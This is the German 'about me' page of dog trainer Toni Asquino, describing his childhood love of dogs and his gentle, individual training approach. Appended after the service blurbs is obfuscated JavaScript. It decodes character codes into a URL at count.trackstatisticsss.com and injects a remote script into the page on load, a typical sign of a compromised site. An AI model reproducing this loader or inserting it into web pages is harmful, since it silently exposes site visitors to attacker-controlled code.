Über mich

Ihr Hundetrainer

Toni Asquino

Schon als Kind war kein Hund vor mir sicher. Ich musste zum Leidwesen meiner Eltern zu jedem Hund hinlaufen und mit ihm spielen oder ihn beobachten und studieren.  Ich konnte nicht einfach so an einem Hund vorbeigehen, ohne ihn zu beachten. Das war unmöglich. Übrigens kann ich das heute auch noch nicht, aber jetzt zum Leidwesen meiner Frau ;-).

Da mir meine Eltern leider nie einen Hund kaufen wollten, bin ich einfach zu unseren Nachbarn oder Freunden gegangen und fragte, ob ich mit ihren Hunden unentgeltlich Gassi gehen dürfte. Ich habe stundenlang mit ihnen gespielt und sie beobachtet. In dieser Zeit habe ich sehr viel über die Körpersprache von Hunden gelernt. Das hilft mir heute noch, einen Hund genau einzuschätzen. Es dauerte auch nicht lange und die Hunde hörten besser auf mich, als auf ihre Halter. Ganz einfach deshalb, weil ich ihre Körpersprache und ihre Bedürfnisse besser lesen konnte als ihre Besitzer.

Leider holen sich viele Menschen einen Hund und meinen, man kann ihn einfach so nebenbei erziehen. Bei etwa 5 bis 10% geht das auch, weil diese Hunde keine großen Anforderungen an ihre Besitzer stellen. Viele sind schon zufrieden und selig, wenn sie beim Gassi gehen ein bisschen rumschnuppern dürfen. Aber wenn SIE das gerade hier lesen, gehört ihr Hund nicht zu den 5 bis 10% und Sie suchen jemanden, der Ihnen helfen kann. Hier komme ich ins Spiel.

Manchmal braucht man nur einen Tipp, eine Idee oder möchte einfach nur mal den Hintergrund des Verhaltens des Hundes wissen. Oder man möchte etwas verändern und weiß nicht genau wie. Manchmal hat man aber auch die Hoffnung schon aufgegeben. Dann nehmen Sie bitte einfach Kontakt zu mir auf – gemeinsam finden wir einen Weg.

Hundetraining darf nicht als lästige Pflicht empfunden werden, sondern als eine gemeinsame, freudige Aktivität. Denn nur so können wir aus Ihrem Hund einen angenehmen Begleiter machen. Um dies zu erreichen, ist ein liebevolles und konsequentes Training notwendig, das Einfühlungsvermögen und Geduld voraussetzt. Über diesen Weg wird ein dauerhaft konfliktfreies, harmonisches Zusammenleben möglich.

Suchen Sie ein sanftes, effektives Hundetraining?

Ich freue mich auf Sie und Ihren Vierbeiner!

img

Individuelles Hundetraining

Wir arbeiten zusammen – perfekt auf Sie, die Umgebung und Ihren Hund abgestimmt.

Überforderung vermeiden

Kleine Schritte in die richtige Richtung sind der Anfang einer großen Veränderung.

Unterforderung vermeiden

Ein glücklicher, umweltsicherer Hund wird gefordert und langweilt sich nicht.

Fehlverhalten haben ihre Gründe

Gehen wir der Sache auf den Grund. Finden wir heraus, warum ihr Hund so ist, wie er ist.
var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}